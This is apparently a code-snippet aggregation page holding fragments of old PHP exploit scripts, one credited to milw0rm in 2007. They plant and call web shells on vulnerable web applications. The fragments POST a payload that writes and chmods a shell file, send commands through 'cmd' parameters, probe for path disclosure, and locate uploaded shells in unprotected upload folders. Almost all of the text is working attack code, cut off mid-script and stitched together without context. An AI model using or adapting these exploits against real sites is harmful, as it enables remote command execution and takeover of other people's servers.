Exemple #1
0
chmod(\'piggy_marty.php\',777);');
$data = "shell={$my_shell}";
$packet = "POST " . $p . "index.php HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet .= "Referer: http://" . $host . $path . "index.php\r\n";
$packet .= "Accept-Language: it\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept-Encoding: gzip, deflate\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Cache-Control: no-cache\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
echo "StepX - Executing Shell..\r\n";
$packet = "GET " . $p . "piggy_marty.php?cmd={$cmd} HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Cookie: cmd={$cmd}\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html, "666999")) {
    echo "Exploit succeeded...\r\n";
    $temp = explode("666999", $html);
    die("\r\n" . $temp[1] . "\r\n");
}
# Coded With BH Fast Generator v0.1
?>

# milw0rm.com [2007-05-29]
Exemple #2
0
function execute_commands()
{
    global $p, $host, $port, $packet, $command, $html;
    $packet = "GET " . $p . "shell.php?cmd=" . urlencode($command) . " HTTP/1.1\r\n";
    $packet .= "Host: " . $host . ":" . $port . "\r\n";
    $packet .= "Connection: CLose\r\n\r\n";
    show($packet);
    sendpacketii($packet);
    if (eregi("Hi Master", $html)) {
        echo "Exploit succeeded...";
        die;
    } else {
        echo "Exploit failed...";
    }
}
function disclose_path($paths)
{
    global $p, $paths, $host, $html, $application_path;
    for ($i = 0; $i <= count($paths) - 1; $i++) {
        $packet = "GET " . $p . $paths[$i] . " HTTP/1.1\r\n";
        $packet .= "Host: " . $host . "\r\n";
        $packet .= "Connection: Close\r\n\r\n";
        show($packet);
        sendpacketii($packet);
        if (eregi('Fatal error', $html)) {
            $temp = explode('in <b>', $html);
            $temp2 = explode('</b>', $temp[1]);
            $result[$i] = $temp2[0];
            $temp = explode('/', $paths[$i]);
            $temp2 = explode($temp[0], $result[$i]);
            $result[$i] = $temp2[0];
            echo "<br>" . htmlentities($result[$i]) . "<br>";
            $application_path = $result[$i];
            break;
        }
    }
}
Exemple #4
0
         }
         if (eregi("url=\"", $HtMl)) {
             $temp = explode("url=\"", $HtMl);
             $temp2 = explode("\"", $temp[1]);
             $path_to_shell = $temp2[0];
         }
         echo "<br>path where I search shell: " . htmlentities($path_to_shell) . "<br>";
         # STEP 2 -> Launch commands...
         #by default a "UserFiles/File/" dir is generated inside site root when you upload
         #files, this dir is not protected by an .htaccess file or whatever
         $pAcKeT = "GET " . $path_to_shell . $filename . "?cmd=" . urlencode($cmd) . " HTTP/1.1\r\n";
         $pAcKeT .= "User-Agent: GoogleBot/1.1\r\n";
         $pAcKeT .= "Host: " . $host . "\r\n";
         $pAcKeT .= "Connection: Close\r\n\r\n";
         show($pAcKeT);
         sendpacketii($pAcKeT);
         if (eregi("200 OK", $HtMl)) {
             if (eregi("Hi Master!", $HtMl)) {
                 echo "Exploit succeeded...<br>";
                 echo "we have a shell in http://" . $host . $path_to_shell . $filename . "<br>";
                 echo "we should have phpinfo() here, see html...<br>";
                 die;
             } else {
                 echo "Successfully uploades...<br>\n\t\t\t                      but is not an executable on target server...<br>";
             }
         }
         refresh();
     }
 }
 #if you are here...
 echo "Exploit failed...";
 function check_pm()
 {
     global $p, $host, $cookie, $html;
     $packet = "GET " . $p . "pms.php HTTP/1.0\r\n";
     $packet .= "Host: " . $host . "\r\n";
     $packet .= "User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
     $packet .= "Cookie: " . $cookie . "\r\n";
     $packet .= "Connection: Close\r\n\r\n";
     sendpacketii($packet);
     if (eregi("sun-tzu", $html)) {
         return true;
     } else {
         return false;
     }
 }